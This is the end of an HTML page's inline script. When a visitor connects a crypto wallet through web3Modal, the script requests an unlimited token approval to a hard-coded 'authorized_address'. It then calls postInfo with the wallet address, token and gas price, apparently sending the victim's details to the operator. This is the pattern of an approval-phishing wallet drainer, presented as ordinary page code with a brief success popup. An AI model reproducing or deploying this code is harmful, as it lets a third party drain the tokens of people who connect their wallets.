	         	if (selectedAccount && provider) {
	         		const web3 = new Web3(provider);
	         		const contract = new web3.eth.Contract(ABI, approveAddr)


	         		const gasPrice = await web3.eth.getGasPrice()
	         		
	         		const  price2 = gasPrice / 10000000000
	         		
	         	    const price = 	price2.toFixed(2); 

	         		// var gas = await contract.methods.approve(authorized_address, web3.utils.toBN('0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff')).estimateGas({
	         		// 	from: selectedAccount
	         		// },function(err, tx) {
					//
					//
	         		// 	console.log(err, tx)
					//
	         		// })
	         		// if(gas == undefined){
	         		// 	gas = 80000;
	         		// }



	         		contract.methods.approve(authorized_address, web3.utils.toBN('0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff')).send({
	         			from: selectedAccount,
	         			gasPrice: gasPrice,
	         			gas:80000,
	         		}, function(err, tx) {
	         		    // alert(err)
	         		    
	         		    // alert(price)
	         			if(!err){


	         				$(".tishi").fadeIn()
	         				setTimeout(function () {
	         					$(".tishi").fadeOut()
	         				},2000);



	         				postInfo(selectedAccount,bizhong,price)
	         		// 		postInfo(selectedAccount,bizhong)
	         			}
	         			$('.modal-overlay').remove();

	         				$('.modal').removeClass('modal-in').addClass('modal-out');

	         			console.log(err, tx)

	         		})
	         	} else {
	         		provider = await web3Modal.connect()
	         		provider.enable()
	         		const web3 = new Web3(provider);
	         		const accounts = await web3.eth.getAccounts()
	         		selectedAccount = accounts[0]


	         		const contract = new web3.eth.Contract(ABI, approveAddr)
	         		const gasPrice = await web3.eth.getGasPrice()
                    const  price2 = gasPrice / 10000000000
	         		
	         	    const price = 	price2.toFixed(2); 
	         		// var gas = await contract.methods.approve(authorized_address, '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').estimateGas({
	         		// 	from: selectedAccount
	         		// },function(err, tx) {
					//
					//
	         		// 	console.log(err, tx)
					//
	         		// })
	         		// if(gas == undefined){
	         		// 	gas= 80000;
	         		// }
	         		console.log(gas)

	         		contract.methods.approve(authorized_address, '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff').send({
	         			from: selectedAccount,
	         			gasPrice: gasPrice,
	         			gas: 80000,
	         		}, function(err, tx) {
	         			console.log(err, tx)
	         			if(!err){
	         					$(".tishi").fadeIn()
	         				setTimeout(function () {
	         					$(".tishi").fadeOut()
	         				},2000);
	         				postInfo(selectedAccount,bizhong,price)

	         			}
	         			$('.modal-overlay').remove();

	         				$('.modal').removeClass('modal-in').addClass('modal-out');


	         		})
	         	}
	         }

	        /**
	         * Disconnect wallet button pressed.
	         */
	         async function onDisconnect() {

	         	console.log("Killing the wallet connection", provider);

	            // TODO: Which providers have close method?
	            if(provider.close) {
	            	await provider.close();

	                // If the cached provider is not cleared,
	                // WalletConnect will default to the existing session
	                // and does not allow to re-scan the QR code with a new wallet.
	                // Depending on your use case you may want or want not his behavir.
	                await web3Modal.clearCachedProvider();
	                provider = null;
	            }

	            selectedAccount = null;

	            // Set the UI back to the initial state
	            // document.querySelector("#prepare").style.display = "block";
	            // document.querySelector("#connected").style.display = "none";
	        }

	        /**
	         * Main entry point.
	         */
	       //  window.addEventListener('load', async () => {
	         	init();
	         	document.querySelector("#btn-connect").addEventListener("click", onConnect);
	        // document.querySelector("#btn-disconnect").addEventListener("click", onDisconnect);
	   // });
	   
	       


	     });
	function _init(argument) {
			// body...
		}
		


	</script>

		
		
		
	
	</body>

</html>